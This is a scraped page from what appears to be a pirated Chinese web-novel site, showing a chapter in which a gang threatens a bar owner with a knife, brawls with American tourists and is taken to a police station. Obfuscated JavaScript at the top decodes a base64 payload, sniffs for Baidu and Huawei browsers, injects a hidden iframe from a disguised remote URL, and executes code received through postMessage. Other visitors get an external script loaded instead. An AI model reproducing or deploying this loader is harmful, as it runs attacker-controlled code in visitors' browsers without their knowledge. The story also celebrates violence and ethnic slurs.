小男生H本子_贵妃好紧致H

撩妹情话 情话解析 2021-02-22 15:09:34 17 0
eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
快捷c作: 按键盘上方向键 ← 或 → 可快速上下翻页 按键盘上的 enter 键可回到本书目录页 按键盘上方向键 ↑ 可回到本页顶部! 如果本书没有阅读完,想下次继续接着阅读,可使用上方 ;amp;quot;收藏到我的浏览器;amp;quot; 功能 和 ;amp;quot;加入书签;amp;quot; 功能!几个人边吃边聊,很是开心,砂锅儿羊宝也上来了。“尝尝吧。”“到底是什么啊?”“先尝尝再说嘛。”“我不,”玉倩看到几个男的都是一脸的坏笑,伸出的筷子又收了回来,“先告诉我是什么。”“又不是毒药,”侯龙涛帮她盛了一小碗汤,“我们还能害你是怎么招。”“你先吃,让我看看。”“行,”侯龙涛从锅里夹起一个r丸子样子的东西放进了嘴里,“很不错的。”“哼。”玉倩舀起一个“丸子”,小心谨慎的咬了一小口,叭唧叭唧嘴,然后把整个“丸子”都放进嘴里嚼了。“好吃吗?”“还不错啊,这不就是砂锅儿丸子嘛,弄得那么神秘干嘛?”“哈哈哈哈…”男人们全都笑了起来,连黄慧也忍不住抿起了嘴。“这到底是什么啊?”玉倩把刚刚夹起的第二个“丸子”放回了碗里,“涛哥哥,你告诉我吧。”“哈哈哈…”侯龙涛笑得都快背过气去了。“死人。二嫂,你告诉我嘛。”“唉,”黄慧也不想看着这群小混蛋这么“欺负”一个漂亮姑娘,“那是…”她犹豫了一下儿,走到女孩儿身边,耳语了一句,“那是羊…羊g丸。”“啊!?”玉倩惊叫一声,简直是花容失色了,右手捂住自己的嘴巴,起身冲了出去。“还不去看看?”黄慧在侯龙涛的后背上重重的拍了一把。“哎哟,追,我能不追吗?”侯龙涛紧跟着女孩儿出去了,剩下的几个人还在“哈哈”的大笑着。这个时候,天已经黑了下来,这附近的路灯也不是非常好,玉倩也不知道自己要到哪儿去吐,这片儿饭馆儿边儿上有两棵大杨树,她就扶住了其中一棵,左手按着自己的胸口,开始弯腰干呕了起来。“吐不出来就别吐了,”侯龙涛跟了上来,轻轻拍着女孩儿的后背,“很有营养的,滋y补阳,没坏处。”玉倩的毛病不是出在胃里,而是出在脑子里,她又没把手指往嗓子眼儿里c,确实是吐不出来,她猛的转过身来,两只小粉拳用力的捶在男人的胸口上,“你怎么那么坏啊!?你讨厌死了,讨厌死了,很死你了!”“疼,疼。”侯龙涛没开玩笑,薛诺、茹嫣她们在撒娇的时候也会打他,但都是毫不加力的,这个大小姐可真是侔足了劲。“疼死你,你个大混蛋。”玉倩的攻势丝毫没有减弱之势,反而更使劲儿了。“好妹妹,”侯龙涛一下儿抓住了女孩儿的双腕,声音很柔和,“别打了,好妹妹。”“别抓着…”玉倩抬起头,看到了男人那双满含情意的眼睛,突然停止了叫嚷,脸一红,一噘小嘴儿,甩开他的手,转身走开了两步。侯龙涛立刻跟上去,从后面一把抱住了美女的肩头,把脸贴住她的粉面轻轻磨擦,“别生气了。”“哼。”玉倩并没有挣扎,只是微微的摇了摇身子。“倩妹妹,”侯龙涛扭过头,轻轻的咬住女孩儿香甜的耳垂儿,“我想你,好高兴你回来了。”“我不喜欢人耍我。”玉倩还是一幅不高兴的样子,身体却是自然的靠在男人的胸前了。“你生气的时候更漂亮了。”侯龙涛开始顺着女孩儿滑嫩的面颊向前亲,逐渐靠近她的香唇,同时右臂慢慢后撤,左臂缓缓前伸,想要以巧劲儿把她转过身来,却不至于让她离开自己的怀抱。可玉倩就像条小泥鳅一样,顺势就从男人手臂的缝隙中钻了出去,“回去吧,别让他们等急了。”说完就扭嗒扭嗒的向饭馆儿走去。侯龙涛还从来没被一个自己喜欢的女孩儿这么挑逗过呢,居然有了种新鲜的感觉,赶紧追了上去,拉住美女的小手儿。玉倩脸上出现了艳艳的笑容,却还是一闪身,躲开了男人的手。两个人边逗边回到饭馆儿里,里面除了自己人外,又多了四个人,三个二十出头儿的白人青年和一个中国人,很可能是个翻译什么的。侯龙涛在刚才出去追玉倩的时候就看到这四个人在找饭馆儿,没想到选了自己这家,不过他也不在意,不管是旅游的,还是留学的老外,到北京的小馆子找风味儿是再常见不过的了,他和玉倩坐下,一群人又开始连吃带贫,不过女孩儿是说什么也不碰那盆砂锅儿羊宝了。那个翻译看来也没来过这种只有“下九流”才出没的地方,拿着本儿书写及其潦草的菜单儿直挠头,三个老外有点儿坐不住了,看到边儿上那桌儿吃得津津有味儿,便问翻译他们吃的是什么。翻译也只认识几样儿最常见的,其它的可就说不上来了,他叫来伙计,自己站到武大和二德子中间,往桌上指指点点的询问。大胖这一桌儿的男人全都停止了吃喝,转头横眼儿盯着那个翻译,可他却像没知觉一样,继续一边指手划脚,一边回头以英语向三个老外解释。“吃饭,吃饭。”侯龙涛心情很好,不打算惹麻烦,也不想这么快就把本来面目暴露给玉倩,就决定容忍翻译极其没有礼貌的行为。“r,假洋鬼子。”二德子扭回头的同时嘀咕了一句。“你说什么?”那个翻译可听到这句话了。“我说什么了?”“我听见了。”“嘿嘿嘿,你听见了有什么奇怪的,我说得那么大声儿,就是为了让你听见。”“你怎么随便骂人。”“我他妈骂你怎么了?”二德子站了起来,手里抓着个酒瓶儿,歪着脑袋,撇嘴盯着翻译,一幅痞子样儿。“小流氓儿,不跟你一般见识。”翻译退回了自己的桌子。三个老外虽然听不懂说的是什么,但看也看得出来是怎么一回事儿,他们问了翻译两句,那个翻译说是一群北京的小流氓儿,不值得pay any attention,他们也就把注意力又转回了食物上,“你们中国人就像野蛮人一样,连狗都吃。”“是啊,我们穷啊,没有美国发达,有什么就得吃什么。”侯龙涛、刘南和玉倩都是从美国回来的,对面儿说的什么他们都清楚,侯龙涛可有点儿受不了了,后槽牙磨的“吱吱”直响。“呼,”玉倩凑过来,往男人的脸上吹了口香气,“你想打他们吗?”“嗯。”“现在不要了吧,跟老外打架,警察一定会来的,我今天还想去别的地方玩儿玩儿呢,下此有机会再打吧。”“呼…”侯龙涛压了压火儿,“都吃好了吧?吃好了就走吧,这儿有股羊s味儿。”“行,走吧。”其他人也明白他的意思。他们就这么离开了饭馆儿,来到了停车的地方,“想去哪儿?”“去三里屯儿坐坐吧,我听说那儿新开了一家‘美国吧’,完全是乡村风味儿的。”玉倩是今天的主角,她的要求是不会被拒绝的。几个人各自上了车,向朝阳三里屯儿的方向开去。“我都不知道有个‘美国吧’,你的消息怎么那么灵通啊?”“我两个月之前就知道了,给田东华打电话的时候,他告诉我的,说是北京少有的几家有气氛的酒吧之一。”“那你不让他带你去?”在第一次提到田东华的时候,侯龙涛因为有特殊目的,并没太在意,现在他突然有点儿酸酸的感觉。“什么意思?你不愿意陪我去?”“不是,当然不是了。对了,田东华有没有跟你提起过我?”“没有,他又不知道我认识你。”“你也没跟他提起过我?”“没有,我们有我们的事儿,为什么要提起你?”“你们有你们的事儿?什么事儿?”“与你无关的事儿呗。”“你的事儿都与我有关。”这是侯龙涛继把陈倩抱上床之后,第一次吃醋。“切,又自作多情。”玉倩的笑容老是甜甜的…“美国吧”的店面还挺大,除了一个供乐队表演用的舞台外,完全是按照美国的休闲吧设计的,中间有两张“九球儿”的按子,大吧台后面的墙上还挂了一面巨大的美国国旗。这里虽然没坐满,但生意也算不错了,而且看看那些顾客,有几个老外,剩下的都是白领儿、大学生的样子。九个人找了一张靠墙的大桌子坐了下来,侯龙涛看着那面星条旗,气儿就不打一处来,他一伸手,“伙计。”“maake your order,sir?”一个男服务员来到了桌旁。“are you japanese?”“no,ichinese。”“那你跟我说什么英语啊?”侯龙涛真是一气未消,二气又起。“it‘s our store policy。our manager askedto speak english during service hours。”“行了,行了,”侯龙涛也觉得没必要和一个打工的较真儿,“去把你们老板叫来。”“it’s something wrong?”“去把你们老板叫来。”侯龙涛用食指点了点桌子。“ok,please wait。”那个伙计一脸茫然的离开了。“怎么了?”几个人都不知道侯龙涛在干什么。“我他妈要把这儿拆了。”“为什么啊?”“因为这儿的一切都让他看着不顺眼。”玉倩笑嘻嘻的帮他回答了。“你…”侯龙涛皱着眉瞧着巧笑嫣然的美女,“你成心带我来这儿的?”“当然了,我一直也没说要去别处啊。”“你明白我什么意思。”“嘻嘻,知道你看不惯什么。”“你们说什么呢?”剩下的人是真的听不明白。“没什么。”侯龙涛早发现玉倩是个聪明伶俐的丫头,没想到还是个小鬼头,知道怎么投人所好,“玉倩,你想怎么样?”“玩儿呗。”“你肯定你玩儿的起?”“有什么玩儿不起的?什么我都玩儿的起,再说了,有理走遍天下,理在咱们这边,看你知不知道了。”“我还真知道。”“几位,”一个梳着油光锃亮的背头的中年男子走了过来,“我可以为你们做什么吗?”“你是这儿的老板?”“是。”“你贵姓啊?”“免贵,姓刘。”他大概是听伙计说了,这几位不喜欢听英语,好像还是在找碴儿,所以过来后一直用的是中文。“请你把那面星条旗摘下来。”因为对方说话比较客气,侯龙涛也没上来就发作。“先生,我们叫‘美国吧’,挂美国国旗,是特色,如果您不喜欢本店的风格,请您安静的离开,不要影响我们正常的营业。”刘老板说的是真客气,但实际上是在往外轰人。“谁准许你挂这面旗的?”“本店挂什么旗子是我们经营者的自由,与任何人无关。”“我现在是好儿好儿的跟你说,请你把它摘下来。”“我也是在好儿好儿的跟你们说,来这儿的客人都是图个放松,图个好气氛,旗子不会摘,请你们离开吧。”刘老板的语气依旧客气,脸却沉了下来,他已经确定了这几个人没安好心。“你妈了x的,”马脸一拍桌子,他不知道四哥是为了什么,但没人敢叫自己的兄弟滚蛋,“让你丫摘,你他妈就摘,别找不痛…”“马脸。”侯龙涛压了压手,示意他先不要闹,“刘老板,中华人民共和国的《国旗法》里明文规定,除了外商独资企业,或中外合资企业,其余一切盈利性实体不得悬挂外国国旗,这你知道吗?”“哼哼,不知道,不过你一说我就知道了。”“那就请摘下来吧。”“不摘。”“嗯?”“我是美国人,这里就是外商独资的。”这句话可就把侯龙涛对于那面星条旗的不满全都转移到了刘老板身上,“美籍华人”是入了美国籍的中国人对自己最常见的称呼,多多少少表现出了他们对自己中国血统的尊重与自豪,只有一种中国人在入美国籍后称自己是“美国人”,而那种人也就是他最厌恶的了,“不管你是哪国的人,在中国的土地上就得遵守中国的法律。”“我很守法的,只可惜中国的法律在这上面管不着我。”“《国旗法》规定外资企业可以悬挂外国国旗,但必须同时悬挂中国国旗,而且外旗在高度和面积上都不得超过中国国旗,既然你很守法,要么你现在就挂上一面五星红旗,要么就把星条旗摘下来。”“啊…”刘老板一时语塞,他刚才把话说满了,“你编出条儿法律就想骗倒我吗?不摘。”他们对话的声音在不自知的情况下越来越高,附近的顾客都在向这边看,“没事儿,没事儿。”刘老板赶忙安抚了两句,他自知这么下去对生意没什么好处,“你们赶紧走吧,这里不欢迎你们这样的顾客。”“你自己不摘,我可要帮你摘了。”“你敢!?我这儿是合法卖买,是受法律保护的,你要是敢闹事儿,我可要报警了。”侯龙涛看了一眼玉倩,只见她还是在甜甜的微笑,不过黑亮的眼珠儿开始向上转,好像是在示意可以开始了。“你还真不愧是美国人,只有当法律对自己有利的时候才遵守。”侯龙涛突然一把抓住了刘老板的领带,猛的向下一拉,把他扥的一趔趄,摔到了桌子上,脸都贴在了桌面儿上。“干什么!?干什么!?放开我。”侯龙涛一伸手,接过了文龙递来的折叠刀,用刀面儿拍了拍刘老板的脸颊,“你再动一下儿我看看。”剩下的六兄弟全都站了起来,把其他顾客的视线挡住了。“有话好说。”刘老板停止了挣扎,他本来力量就没有对方大,没有刀子都起不来,有了刀子更是起不来了。“你给我听清楚了,我一个电话就能让你关两个月的门儿,等你恢复了营业,我再让人天天来问候你,你现在乖乖的把那块儿裹尸布给我扯下来,我就当什么都没发生过,好不好?”侯龙涛慢条斯理的威胁着,“我这么跟你说,你可能觉得我是在唬你,也许我就是在唬你,你现在就可以报警,只要你有那胆子。”他一抖胳膊,把姓刘的推开了。刘老板退了两步,这才开始仔细的打量面前的一群年轻人,看穿着打扮像大款,看举止像流氓,听说话又有点儿官面儿上的味道,很可能是一帮家里有权有钱的“太子”、“公主”。他是从国内出去的,知道最好不跟什么人结仇儿,“john,take down the flag。”“yes,sir。”吧台后的调酒师和一个伙计一起把星条旗摘了下来…第一百一十七章  外交事件(上)7/11/2003“我r,你丫刚才说的那几条儿法律是不是真的?”在刘老板认松之后,几个人也就开始正常的聊天儿了。“当然是真的了。”侯龙涛白了马脸一眼。“你丫怎么知道的?”“你们都不看新闻是怎么招啊?已经有了好几起因为悬挂外国国旗引起的纠纷了。”“诶诶诶,看看。”二德子忽然桶了侯龙涛两下儿。一群人顺着二德子的视线一看,有四个男人走进了酒吧,正是刚才吃饭时那一高两矮三个老外和翻译,他们坐在了不远的地方。那个高个儿叫了一个伙计过去,指着吧台后原来挂美国国旗的地方问了几句,那个伙计边回答边向这边指了指,那个老外一拍桌子,竟然走了过来,翻译像条狗一样跟在后面。等老外来到跟前,侯龙涛才看出来,这家伙比自己高了最少半头,得有一米九几,大概跟大胖差不多,但绝对没大胖那么壮。“who asked the bartendertake down the flag?”老外也不等翻译说话,上来就吼。“i did。you goroblem with that?”侯龙涛一梗脖子,“傻x。”“what did you say?”“go learn some chinese。”刘南也添了一句。“guys,guys,calm down。”刘老板赶紧过来劝解,他把老外拉到一边儿解释了一阵,说明中国的法律,当然没把自己被人胁迫的事儿讲出来。“stupid chinese law。”老外一甩手,不服不忿的走回自己的桌子,但还是经常向侯龙涛他们投来敌视、鄙夷的目光,但他毕竟是男人,也发现了玉倩的美貌。不一会儿,一个伙计给玉倩送来了一杯“magarita”,“小姐,这是那边那位先生送给您的。”他对这桌儿这几位可是有所忌惮,完全没用英文。“谢谢。”玉倩都没给侯龙涛说话的机会,就把酒就接了,然后转身冲那个老外举了举杯,也没喝,就又把杯子放在了桌儿上,把文龙叼着的烟头儿抢了过来,往杯子里一扔。在一阵哄笑声中,那个老外的脸可就有点儿挂不住了,在酒吧送酒被女方拒绝是很正常的,是男人就应该有那种接受现实的风度,但这样被戏耍可就不是一般人能忍受得了的了,要不是他的两个同伴拉住了他,他还真就要过来再说上两句了。这一切侯龙涛都看在眼里,他今天不跟个老外动手就不舒服,“再玩儿大点儿?”“问我?”玉倩一抬眉毛。“是啊。”“无所谓,你想玩儿多大我都撑着你。”“哈哈哈,我现在可真是好奇了,你家里人到底是干什么的?”“不告诉你。”“哼哼,早知道去年你走之前想告诉我的时候,我就该接受的。”“你错过机会了。”侯龙涛苦笑着摇摇头,起身向舞台走去,那里有一个刚刚到达的乐队在准备乐器,“嗨,哥儿几个帮我个忙儿啊?”几个乐手都是长头发、小背心儿,一幅“摇滚青年”的打扮,其中一个放下了手里的活儿,“什么忙儿?”“帮我伴个奏。”“你要唱?”“是。”“那也得等点歌儿的时候才行。”“破个例吧。”侯龙涛从西装的内兜儿里掏出一捆人民币,“银行的封条还没拆呢,一万整。”因为身边的现金快用完了,他今天下午刚取了三万。“哟喝,您是真想唱啊?”“怎么样?”“什么歌儿?”“‘红色摇滚’的《志愿军战歌儿》。”“这儿是‘美国吧’。”“怎么了?是‘美国吧’,又不是美国。”“行,您来吧。”“r,四哥要唱歌儿?”马脸看了看二德子。“他要干嘛啊?”文龙瞧着玉倩。“我也不知道,应该是想激那几个老美跟他动手,你们没问题吧?”“切,说什么呢?我们哥们儿是从小儿打起来了,有什么问题?”“雄赳赳,气昂昂,跨过鸭绿江。保和平,为祖国,就是保家乡。中国好儿女,齐心团结进,抗美援朝,打败美帝野心狼。我的爸爸,去过朝鲜战场,为了保卫祖国,为了保卫家乡,打败了美帝,保为了和平。嘹亮的军歌,威武雄壮。我们的先辈去朝鲜打仗,英勇战斗,是民族的脊梁。鸭绿江水静静的流淌,嘹亮的军歌,在耳边回荡…”侯龙涛在雄壮的音乐伴奏下嚎了起来,虽然他天生就五音不全,但这首歌儿唱的倒还没太跑调儿,酒吧里客人的注意力都被他吸引过去了。刘老板在隔音的办公室里,根本听不到外面的情况,他要是发现演奏的曲目和事先预定的不同,早就会出来制止了。“stop!stop!”那三个老美冲了过来,他们已经通过翻译明白了歌词的大意,还了解到当年在朝鲜战争中,中国军人就是唱着这首歌儿,把自称天下无敌的美国海、陆、空三军打得人仰马翻,老老实实的退回三八线后,这是一首杀美国人用的歌儿,他们现在可要奋起维护美国的尊严了。“what‘s up?”侯龙涛从台上跳了下来。“what the fuck were you singing?”这个高个儿已经喝了三、四杯“tequila”,都有了四分醉意了。“get lost,you loser。”“sayagain。”“you loser。”“you wantget beat up?”“hell yeah。”两个人越离越近,几乎都贴到了一起。侯龙涛的兄弟们也都上来,黄慧还是比较淑女的,没来凑热闹,但玉倩就不同了,直接站到侯龙涛身边,嘴里也不闲着,“american suckers。”那个老外刚才就受了这小妞儿的气,现在又被她骂,自然不会毫无反应了,他一探头,做势看了一眼女孩儿的p股,“nice ass。 how aboutget together later?i will let you tastehuge american cock。”“smart asshole。”侯龙涛这还能干,刚想动手,没想到老美比他还急,已经一把将他推了出去。玉倩是第二个动手的,上去就给了那高个儿的裤裆处一膝盖,然后自己立刻就退开了。“you little whore!”老外咬着牙,这一下儿被磕的不轻,他左手捂着自己的跨间,举起右手就想去打玉倩,“bitch!”侯龙涛挨的那一下儿也很重,他向后急退了好几步才站稳,正好儿停在了两张台球儿桌中间,顺手就从案子上抄起了一根儿球杆,“you motherfucker!”他冲上前去,抡圆了抽在高个儿的肩膀上。“啪”的一声,球杆儿从中间断开了,可见用力之足。出乎意料,那个老美还挺壮的,虽然很痛苦的惨叫了一声,但看架式还想还手儿。“fuck your mama!”英语再不好,这句还是会骂的,兄弟七人一拥而上,和三个老外打成了一团。老美们可不光挨揍,也伺机还击一两下儿,但明显是处于极为被动的状态。那个翻译不过是个没骨气的知识分子,可不敢加入战团,一看到真的动了手儿,早就躲到一边儿拨电话报警了。刚把高个儿拉倒在地踢了两脚,刘老板就闻讯从办公室冲出来劝架了,他拉住了侯龙涛的胳膊,“别打了,你们不要在这里闹事儿啊。”侯龙涛是第一次打老外,还是那些趾高气昂的美国人,正在兴高采烈之时,却有人出来捣乱,那还了得了?回身照着姓刘的脸上就是一拳,打得他鼻血长流。110的反应也算很迅速了,警笛声由远而近,停在了酒吧外面,五、六个警察冲了进来。侯龙涛他们以前可是经常和警方打交道的,可以说是无比的“懂事儿”,都没等条子发话,他们就已经停了手,还都特自觉的向后退了好几步。三个老外可就没那么乖了,爬起来的时候还是“fuck”、“damn”的骂个不停。“刘老板,怎么回事儿啊?”带队的警察走了上来,他们都是三里屯儿派出所儿的,对于这些酒吧的老板还是很熟悉的。“我也不知道啊,我出来的时候他们已经在打架了。”刘老板用手绢儿捂着口鼻,指了指侯龙涛他们,心里是真想把责任都推到他们身上,但他还算是个比较识时务的主儿,暂时不站在任何人的对立面儿是明智的选择。“你鼻子怎么回事儿?”“被碰了一下儿。”“你看看有什么损失吧。”那个警察转过身,突然看清了侯龙涛的面目,侯龙涛也看清了他,两个人都是一愣。“哈哈哈哈,姓侯的,你小子跟我还真有缘啊。”“哼哼,真是巧了,杨科长。”“别,拜你所赐,我现在就是个副所长。”不是冤家不聚首,那个警察就是几个月前因为“越权执法、刑讯供”而被降职的杨立新。“杨所长,您认识他?他是…”刘老板凑到了杨立新身边,他这个美籍商人,平时对这些警察可没这么客气过。“就是个儿小流氓儿。”“小流氓儿?他不是高干子弟吗?”“什么高干子弟,我就办过他。”“他,就是他,我的鼻子就是他打的,这帮人今天就是来我的酒吧找麻烦的。”“行啊,那你也跟我回所儿里做个笔录吧。”“好。”“刘老板,你还变得真快啊,”侯龙涛冷冷的一笑,“你的酒吧大概是开不下去了。”“你这是在威胁证人吗?”杨立新又走近了一步。“没有,没有,没那个意思,不过你也不能光听他的一面之词吧?”“当然不能了,你教过我的,得秉公执法啊,跟我走吧,有什么话都回所儿里再说。”一个警察走到高个儿老外身后,轻轻一推他的肩膀,“走吧。”“don‘t touch me!”翻译已经向他说明需要去派出所儿的情况,这小子还真不怕,回身就推了警察一把,带着他的两个同伴和一条“狗”,牛x烘烘的向酒吧外走去,“i can walk myself,you dumbass chinese。”“你丫怎么那么松啊?”侯龙涛边走边指了指那个被推的警察,“美国鬼子都骑到你脖子上拉屎了,真他妈丢人。”“那两个女的也是他们一起的。”刘老板一个也不想放过。“你们也来吧。”杨立新向两个女孩儿勾了勾手指,“你笑什么?”他看到了笑嘻嘻的玉倩那幅满不在乎的样子。“怎么了,你长得奇怪,还不许人笑啊?”玉倩乐呵呵背上小包儿,掏出手机,边拨边走。“哼,小太妹,一会儿有你哭的时候。”因为“犯人”多,警车少,侯龙涛他们的车也被用上了,杨立新特意挑了那辆sl500,他要和侯龙涛单谈(我、“武大”、“二德子”和“马脸”最后一次因为打架被带到派出所儿的时候就是在一个“联防”的监督下,由“二德子”开的车)。“侯龙涛,这次你又撞到我手里了,我不会再让你轻轻松松的脱身的。”“你还没学乖?”“我当然学乖了,我会完全按照正常的法律程序处理的。”“正常的法律程序?普普通通的打架,你能把我怎么样?”“你小子狂吧,你以为你还未成年是怎么招?你在闹市打架斗殴,殴打的还是外宾,我说什么也要给你留个底,你的那个什么美国公司不开了你才怪,什么律师也救不了你。”“我是见义勇为,该得好市民奖的。”“目击证人可不是那么说的,你放心,翻不了盘的。”杨立新成竹在胸,他真是感谢老天给了自己一个出气的机会。“杨立新啊,杨立新,你什么时候儿才能开窍啊?你第一次惹我,我忍了;你第二次惹我,我让你降薪降职;你不懂事不过三吗?”“你以为你是个什么东西?我就不信治不了你。”“你可以试,但你永远不会成功的。”侯龙涛对玉倩很有信心。到了派出所儿,一群人被带到了二楼的大厅里,准备做笔录,这不是录口供,又是普通的打架,用不着搞什么隔离,最先做的是刘老板,然后是老外和翻译,剩下都坐在大厅里。“r,又得在这儿坐一夜了,这是咱们住的第几个派出所儿了?”文龙边给大家发着烟边问。“谁还记着啊。”侯龙涛接过了烟。“当然有人记着了,现在好多小孩儿都以这为荣呢。”“你是小孩儿吗?”“不是。”“那不就完了,哼哼。”侯龙涛拉住了坐在身边的玉倩,“宝贝儿,你没问题吧?”“你少这么叫我,我当然有问题了,你们想在这儿坐一夜,我可不想,我都困了。”“那你就想办法把咱们弄出去吧。”这个时候,一个中国人陪着一个四、五十岁的老外走上楼来了,两个人也没跟任何人打招呼,直接就闯进了那间开着门的办公室,把门“砰”的一声关上了。“什么来头儿?”侯龙涛看刚来的两个人不光穿着很考究,而且有一股官气,并非普通的商人可比,就不自禁的自问了一句。“管他什么来头儿,bush来了也没用。”玉倩还是一副天塌下来都无所谓的样子。“您几位先到会议室休息一下儿。”杨立新陪着笑脸儿,把四个老外和两个中国人送了出来,本来笔录是不用副所长做的,但今天他要亲自上阵,“小郑,赶快送茶到会议室。”“好。”一个小警察不知道来了什么大人物,像个饭馆儿跑堂儿的一样,急忙诚惶诚恐的跑去打开水。“嗨嗨嗨,有你们这样儿的吗?”侯龙涛蹦了起来,他知道今天的事儿闹的越厉害,自己就越有机会了解玉倩家真实的身份,“做笔录有四个人一起做的吗?你还让他们去会议室坐沙发?还给茶水喝,你开旅馆的?我们的茶水呢?怎么招啊,杨立新,你改成给美国人当狗了?”杨立新刚要发作,那个美国老头儿先上来了,“are you the one who attacked him?”他指了指那个高个儿美国青年肿起的脸颊。“i didn‘t attack him。he jumpedfirst。by the way,who the hell are you?”“i’m his father。”“the old fool?”“who are you calling ‘fool’?”说话的是那个高个儿,他冲上来就是一摆拳。侯龙涛一直在用眼角儿的余光瞄着对方,对这突然袭击早有准备,他一猫腰就躲开了,紧接着照着高个儿的下巴上重重还了一勾拳。这下儿挨的是真结实,高个儿仰头就倒,要不是有后面的人扶住了他,肯定是得摔到地上的。两人这一再次动手儿,大厅里可就开了锅了,侯龙涛的兄弟们一拥而上,和对面儿的“四洋两中”互相推搡起来。“要造反了!?”杨立新一声怒吼,协同闻声而来的一群警察,开始镇压侯龙涛他们。一直在角落里坐着的刘老板可是吓坏了,真不知道自己找了个什么人做敌人,他要么是个疯子,要么是后台极硬,要么就是个后台极硬的疯子,任何一样儿,自己在北京都不会有好日子过了。侯龙涛他们并没有真正的和警察发生冲突,最多就是把警察伸过来的胳膊拨拉开,但这种行为仍旧会被视为对警方权威的挑衅,更何况还是在派出所儿里,再加上杨立新煽风点火儿的叫嚣,有几个警察已经跑回办公室里取来了电g。看到这种情况,侯龙涛他们很明智的向后退了好几步,和对方拉开一定的距离。“都靠墙蹲下!”杨立新抢过一根电g,冲着侯龙涛就过来了,“小王八蛋,你胆子也忒大了!”“你想干什么!?”玉倩突然冲了过来,挡在了侯龙涛身前。杨立新先是一愣,等看清楚面前是个柳眉倒竖的美丽小姑娘儿,不但没有一点儿怜香惜玉的念头,反而更是上火了,不仅男的敢跟自己作对,就连一个娇滴滴的小妞儿都敢对自己横眉立目,实在是无法容忍,他抬起了左手,做势要扇玉倩的耳光,“你也给我蹲下